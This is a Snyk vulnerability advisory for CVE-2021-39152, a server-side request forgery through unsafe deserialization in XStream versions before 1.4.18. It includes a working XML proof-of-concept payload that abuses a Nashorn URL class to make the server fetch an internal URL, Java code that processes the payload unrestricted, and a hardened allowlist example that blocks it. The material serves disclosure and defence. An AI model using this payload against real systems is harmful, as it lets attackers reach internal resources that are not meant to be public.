Deserialization of Untrusted Data Affecting com.thoughtworks.xstream:xstream package, versions [,1.4.18)
Snyk ID: SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190
- published 24 Aug 2021
- disclosed 24 Aug 2021
- credit m0d9
Introduced: 24 Aug 2021
CVE-2021-39152
How to fix?
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available, solely by manipulating the processed input stream, when running on a Java runtime version 14 to 8. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected.
PoC
<map>
<entry>
<jdk.nashorn.internal.runtime.Source_-URLData>
<url>http://localhost:8080/internal/</url>
<cs>GBK</cs>
<hash>1111</hash>
<array>b</array>
<length>0</length>
<lastModified>0</lastModified>
</jdk.nashorn.internal.runtime.Source_-URLData>
<jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
</entry>
<entry>
<jdk.nashorn.internal.runtime.Source_-URLData>
<url>http://localhost:8080/internal/</url>
<cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
<hash>1111</hash>
<array>b</array>
<length>0</length>
<lastModified>0</lastModified>
</jdk.nashorn.internal.runtime.Source_-URLData>
<jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
</entry>
</map>
import com.thoughtworks.xstream.XStream;

// Unrestricted instance: no allowlist is configured, so any type named in the
// input stream (xml holds the document above) is resolved and instantiated.
XStream xstream = new XStream();
xstream.fromXML(xml);
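For contrast with the unrestricted instance in the PoC, an added example (not code from the Snyk page or the XStream project) showing the allowlist configuration the advisory recommends; the class name SafeXStreamDemo, the allowed types and both sample documents are assumptions constructed for the demonstration:

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

import java.util.HashMap;
import java.util.Map;

public class SafeXStreamDemo {

    // Builds an XStream instance that only unmarshals explicitly allowed types.
    // Any other type named in the input is refused before a converter runs.
    static XStream hardenedXStream() {
        XStream xstream = new XStream();
        // NoTypePermission.NONE clears all existing permissions: deny everything first.
        xstream.addPermission(NoTypePermission.NONE);
        // Then re-allow only what the application genuinely needs (assumed set).
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[] { String.class, Map.class, HashMap.class });
        return xstream;
    }

    // Returns true when the security framework rejected the input.
    static boolean isRejected(XStream xstream, String xml) {
        try {
            xstream.fromXML(xml);
            return false;
        } catch (ForbiddenClassException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        XStream xstream = hardenedXStream();

        // Constructed sample: the shape the application expects, strings only.
        String expected = "<map><entry><string>k</string><string>v</string></entry></map>";
        System.out.println("expected input accepted: " + !isRejected(xstream, expected));

        // Constructed sample: a type the application never asked for (a harmless
        // AWT class standing in for any unexpected type in the stream).
        String unexpected = "<map><entry><string>k</string>"
                + "<java.awt.Point><x>1</x><y>2</y></java.awt.Point></entry></map>";
        System.out.println("unexpected type rejected: " + isRejected(xstream, unexpected));
    }
}
```

Fed the PoC document above, the same hardened instance rejects it as well, because jdk.nashorn.internal.runtime.Source$URLData is not on the allowlist.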